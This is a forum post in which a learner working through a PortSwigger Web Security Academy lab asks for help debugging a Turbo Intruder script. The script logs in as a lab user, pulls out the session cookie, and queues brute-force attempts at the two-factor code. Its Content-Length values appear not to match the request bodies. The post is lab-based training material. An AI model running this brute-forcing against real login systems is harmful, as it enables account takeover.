Hello dear team of PortSwigger, I got an idea while I was doing one of your labs. Basically, I try to use the `Set-Cookie: session` to set it as a cookie header on my following request and so on. The issue is I suck in Python, and in Turbo Intruder the same, so as the script is failing I want to know two things.

1- How can I handle this `Reqs: 1| Queued: 0 | Duration: 2| RPS:1| Connections: 1 | Retries: 0 | Fails: 0 | Next: null Completed |` to determine what is causing the issue? What is the common cause?

2- Well, ChatGPT is doing well but I'm not sure how to capture the responses, and I don't find much in the docs about how to capture a response's parameters. If you want to see, I share my script as an example:
```python
# Turbo Intruder scripts run under Jython 2.7, so f-strings are a syntax
# error there; the print calls below use % formatting instead.
def queueRequests(target, _):
    global engine
    engine = RequestEngine(
        endpoint="https://0a0e00210386a90b81b849f700aa0039.web-security-academy.net:443",
        concurrentConnections=1,
        requestsPerConnection=1,
        engine=Engine.BURP
    )
    # A blank line must separate the request headers from the body.
    initial_login_request = """POST /login HTTP/2
Host: 0a0e00210386a90b81b849f700aa0039.web-security-academy.net
Content-Length: 29

username=carlos&password=montoya"""
    print("Queuing initial request to capture session cookie...")
    engine.queue(initial_login_request, label="get_session")


def handleResponse(req, interesting):
    if req.label == "get_session":
        cookie_header = req.getHeader("Set-Cookie")
        print("Cookie header found: %s" % cookie_header)
        if cookie_header:
            session_value = None
            # The header looks like "session=<value>; Secure; HttpOnly; ...".
            for header in cookie_header.split(';'):
                if header.strip().startswith("session="):
                    # Split once so a value containing "=" is kept whole.
                    session_value = header.strip().split("=", 1)[1]
                    break
            print("Extracted session value: %s" % session_value)
            if session_value:
                brute_force_security_code(session_value)
            else:
                print("Session value could not be extracted.")
        else:
            print("No Set-Cookie header found in response.")


def brute_force_security_code(session_value):
    security_codes = ["0000", "0001", "0002", "0003", "9999"]  # Replace with desired range
    print("Starting brute-force with extracted session cookie...")
    for code in security_codes:
        attack_request = """POST /login2 HTTP/2
Host: 0a0e00210386a90b81b849f700aa0039.web-security-academy.net
Content-Length: 20
Cookie: session=%s

mfa-code=%s""" % (session_value, code)
        print("Queuing brute-force attempt with mfa-code %s and session %s" % (code, session_value))
        engine.queue(attack_request)
```